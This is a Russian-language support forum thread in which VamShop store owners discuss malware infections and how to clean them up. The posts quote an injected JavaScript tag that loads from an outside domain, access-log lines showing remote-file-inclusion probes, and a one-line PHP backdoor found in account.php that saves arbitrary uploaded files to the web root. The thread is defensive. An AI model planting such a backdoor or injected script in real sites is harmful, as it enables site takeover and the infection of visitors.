По поводу вирусов в магазинах

[benz_inst 0]

benz_inst

Вот этот код, что Вы привели где-то в коде сидит, его надо искать и удалять.

Шаблоны писем в /templates/шаблон/mail/russian/

Письмо о регистрации отправляется из /create_account.php

Не смотретли там?

в этом /create_account.phpвроде нет

Уважаемый покупатель!

Вы успешно зарегистрировались в нашем интернет-магазине, теперь Вам доступны следующие возможности нашего магазина:

- Корзина покупателя - Все товары, которые Вы добавили в корзину до регистрации, сохранятся в Вашей корзине.

- Адресная книга - Вы можете делать заказы не только на свой домашний адрес, но и на любой другой. Например, Вы можете сделать подарок знакомым.

- История заказов - Вы можете следить за процессом исполнения Вашего заказа.

- Отзывы - Оставляйте свои отзывы о товарах, заказанных в нашем магазине.

Если у Вас возникли вопросы, свяжитесь с нами по адресу: {$content.MAIL_REPLY_ADDRESS}

Предупреждение: Данный E-Mail адрес был получен нами от клиента. Если Вы нигде не указывали данный E-Mail адрес, свяжитесь с нами: {$content.MAIL_REPLY_ADDRESS}

{if $LINK}Вы подписались на нашу рассылку.

Необходимо подтвердить Вашу подписку, перейдя по ссылке, указанной ниже.

Ссылка активации подписки:

{$LINK}{/if}

{if $SEND_GIFT==true}

Также мы отправили Вам подарочный сертификат на сумму: {$GIFT_AMMOUNT}

Код Вашего сертификата {$GIFT_CODE}, Вы можете использовать его при оформлении заказов в нашем интернет-магазине.

Чтобы активировать подарочный сертификат, перейдите по следующей ссылке {$GIFT_LINK}

{/if}

{if $SEND_COUPON==true}

Поздравляем, Вы получили купон на получение скидки в нашем интернет-магазине.

Ниже Вы можете увидеть подробную информацию о купоне.

Описание: {$COUPON_DESC}

Вы можете использовать его для получения скидки в любой момент, просто укажите код Вашего купона {$COUPON_CODE} при оформлении заказа в нашем интернет-магазине.

{/if}

[support 447]

Посмотрите в Админке - Настройки - Настройка email

Вроде как туда вставили js код.

[support 447]

vitalik

Можно подписаться вот тут - vamshop.ru/index.php

Справа.

Но я правда пока не рассылал рассылок, но в любой момент, в принципе, можно отправить.

[Александр Муравьев 0]

А интересно, в яндексе как-то можно получить более точную инофрмацию, что именно ему не нравится в коде.

Выводит только список url адресов и всё.

Если б хотя бы пример кода был, который ему не нравится.

Никто не интересовался?

сначала я получил письмо что сайт заражен и будет отмечен так к рейтинге

я спросил через панель вебмастера - в чем дело? все ведь в порядке

чуть позже появились данные по урлам в вебмастере

начал думать и поняв что поиски затянутся переставил магазин

через день получил письмо от яндекса

Ранее на странице http://ххххххххх/dow...maintenance.php был обнаружен вредоносный код следующего содержания: <script language='JavaScript' src='http://llvelnternet. ru/?in=23311'></script>

В настоящий момент с Вашим сайтом все в порядке, он прошёл перепроверку и не помечен как угрожающий безопасности компьютера.

[support 447]

Да я вот и говорю, что было б проще искать, если б в яндекс.вебмастере сразу была информация, какой код не нравится.

А то иногда бывает, что прячут довольно хорошо вирусный код, бывает, что его не так просто найти.

[LordBelial 0]

Спасибо! Буду работать.

[-Inna- 0]

сегодня полностью лег сайт у старого знакомого.

Все было сделано как советуется в шапке

после замены папки смарти все залетало

порылись в логе .вот это кто нибудь может прокомментировать

189.42.255.66 - - [15/Mar/2012:02:26:43 +0400] "GET /index.php?cat=3&sort=http%3A%2F%2Fwww.akraplast.it%2Fpublic%2Fnews%2Fbikiyo%2Fewilaxu%2F&direction=asc HTTP/1.0" 200 23780

189.42.255.66 - - [15/Mar/2012:02:26:44 +0400] "GET /index.php?cat=3&sort=name&direction=http%3A%2F%2Fmmec.eng.ku.ac.th%2Fnrct%2Fitknowledge%2Fopigad%2Fziwep%2F HTTP/1.0" 200 23810

189.42.255.66 - - [15/Mar/2012:02:26:45 +0400] "GET /index.php?cat=3&on_page=http%3A%2F%2Fwww.playme.nl%2Factiesarchive%2Febazazo%2Fixe%2F HTTP/1.0" 200 24002

189.42.255.66 - - [15/Mar/2012:02:26:47 +0400] "GET /index.php?cat=3&page=http%3A%2F%2Fwww.gamepat.de%2Fgallery%2Fgallery2%2Fg2data%2Fejilumo%2Fide%2F HTTP/1.0" 200 23162

[YuraS 4]

видимо, бот искал xss-лазейку. не стоит обращать на это внимание.

[KoVaLsKy 59]

acount.php

в самом верху

<?php if(isset($_FILES['upkk']['tmp_name']))copy($_FILES['upkk']['tmp_name'],$_SERVER['DOCUMENT_ROOT']."/".basename($_FILES['upkk']['name'])); ?><?php

[/CODE]

и еще по всему сайту ссылки на сторонний сайт. код судя по всему зашифрованный т.е. просто поиском по ссылке ничего не нашел в файлах

[sheldon 1]

а почему не сделать сборку без таких файлов которые ломают? почему полностью не отказаться от tiny_mce?

[support 447]

shendon

Так Вы прочитайте, что в первом сообщении написано.

Этих файлов и так давно уже нет.

Я написал для "старых" пользователей, предупредил о возможных проблемах.

[sheldon 1]

Доброго времени суток! есть один магаз, с вирусами к сожалению. в нём порядка 100-150 информационных страниц с нужными текстами и около 15 категорий, в которых есть только описание категорий,оно же просто сео и рекламный текст. на сайте всего 5 товаров,которые не сложно создать заново. так как я неумею чистить от вирусов, задаю вопрос: можно ли как то условно безболезненно, все эти информационные страницы скопировать, потом полностью снести магаз,залить чистые файлы из новой сборки и залить информационные страницы с фотографиями и текстами.и ручками добавить 5 товаров? как это сделать легче и проще всего,гарантированно не потеряв информационные страницы,текст и фото? тексты категорий тоже можно сохранить? как?

[KoVaLsKy 59]

делаете полное резервное копирование файлов и БД( через phpmyadmin)

через файзиллу, например, перезаливаете файлы и будет Вам счастье.

вирусы- это коды, внедряемые, как правило не в тексты страниц (БД) а в сами рабочие php, html, js файлы.

все тексты, описания, SEO и прочая бухгалтерия хранится в БД, которая скорее всего в нормальном состоянии.

[geval 3]

вообще давно пора уже внедрить скрипт, наподобие как в дле... кто захочет, включит по крону, чтобы раз в сутки была проверка на модифицированные файлы.. где-то тут на форуме уже писали про это лекарство и приводили пример скрипта..который каждый может сам приделать.

неплохо бы ссылку- а то так фиг найдешь)

ну и готовое бы решение не помешало для вамшоп

[YuraS 4]

тут на форуме уже писали про это лекарство и приводили пример скрипта..который каждый может сам приделать.

неплохо бы ссылку- а то так фиг найдешь)

я пользуюь этим скриптом мониторинга изменений файлов

поставил на крон и каждый час на емейл приходит письмо об изменениях на сервере.

[sheldon 1]

делаете полное резервное копирование файлов и БД( через phpmyadmin)

через файзиллу, например, перезаливаете файлы и будет Вам счастье.

вирусы- это коды, внедряемые, как правило не в тексты страниц (БД) а в сами рабочие php, html, js файлы.

все тексты, описания, SEO и прочая бухгалтерия хранится в БД, которая скорее всего в нормальном состоянии.

Огромное спасибо. Да. Что то я совсем об этом простом варианте забыл.Делал так сто раз.Но уже два года назад И вот за 2 года совсем подзабыл.

Была база сломанного магаза со сбркой 166. залил резервную копию в новый со сборкой 167. все работает. вопрос: все ок? проблем не должно быть,из-за того что база от 166,а залил в 167?

[support 447]

Да, нормально.

[KoVaLsKy 59]

с 1.66 до 1.67 структура баз не поменялась.

все ок

[sheldon 1]

делаете полное резервное копирование файлов и БД( через phpmyadmin)

через файзиллу, например, перезаливаете файлы и будет Вам счастье.

вирусы- это коды, внедряемые, как правило не в тексты страниц (БД) а в сами рабочие php, html, js файлы.

все тексты, описания, SEO и прочая бухгалтерия хранится в БД, которая скорее всего в нормальном состоянии.

а как сделать полное резервное копирование файлов? я обычно просто и тупо копировал всю базу данных и было мне счастье. а тут заглянул на один из сайтов,там общий вес файлов сайта на 5000 товаров, около 3 гигов, это с учетом кучи старья,так как сайт еще с оскомерса мигрировал на вамшоп. и чего то я задумался. надо бы его подчистить. Правильно ли я мыслю: сохранить картинки и базу данных. Снести всё на хрен. Закачать новую голую сборку. Подключить её к старой базе данных и .... поэтому перечитал то что вы мне написали еще два месяца назад.. и прошу совета.

еще вопрос,а в базе данных тоже может быть полно хлама? как ее чистить от ненужного и как понять что там уже не нужно?

[sheldon 1]

перед тем как патчить с 167 до 168 решил слить старые файлы и сделать из них резервную копию файлов. И антивирус показывает что в каждой следующей,в конце перечисленной папке есть троянская программа: jscript, katalog, katalog_admin, katalog_img, последние три папки удалил. это от былых времен обмена ссылками. что делать с jscript?

[support 447]

Да, правильно, если у Вас не было доработок, то достаточно сохранить базу и картинки.

Но сейчас что-что, а место на диске у хостеров дешёвое, лучше уж просто место увеличить, чем по-новой ставить магазин.

А делать копии файлов можно как угодно, например в панелях управления хостингом бывает опция - резервное копирование, можно через панель управления, если у Вас она есть.

В базе особого хлама не бывает, да и опятьже, это экономия на спичках, что называется.

[support 447]

Взять оригинальные чистые файлы из архива с VamShop.

[sheldon 1]

Взять оригинальные чистые файлы из архива с VamShop.

в магазе сейчас есть куча ненужных старых файлов по моему, еще с оскомерса. дело не в экономии дискового пространства хостера. дело в том,что в некоторых папках,при закачке себе на комп,всех файлов,обнаружились вирусы. я просмотрел папки,оказались старые какие то ненужные. все нахрен снёс. включая старые фотки,точно от оскомерса. но всё равно,хочется сделать чистым магаз, без лишнего,без лишних файлов,которые кто то возможно сможет вскрыть и заразить.

поэтому и спрашиваю, можно ли сделать так:

от старого магаза я делаю и оставляю только:

резервную копию базы данных.

сохраняю images

все остальное полностью сношу с дискового пространства хостера.

заливаю вашу новую и чистую сборку. заливаю папку images. делаю новую базу данных. настраиваю параметры подключения к базе в configure.php все. у меня самая последняя сборка. и я удалил весь хлам

так можно сделать или есть какой то другой выход? я могу потестить этот сценарий на поддомене. но мне просто нужен ваш совет. правильным путём я иду или нет.

[support 447]

Я уже выше отвечал, что да, можно так сделать.

[sheldon 1]

Я уже выше отвечал, что да, можно так сделать.

лучше перестраховаться и задать вопрос снова. спасибо.теперь все понял. попробую вначале на поддомене,еще раз спасибо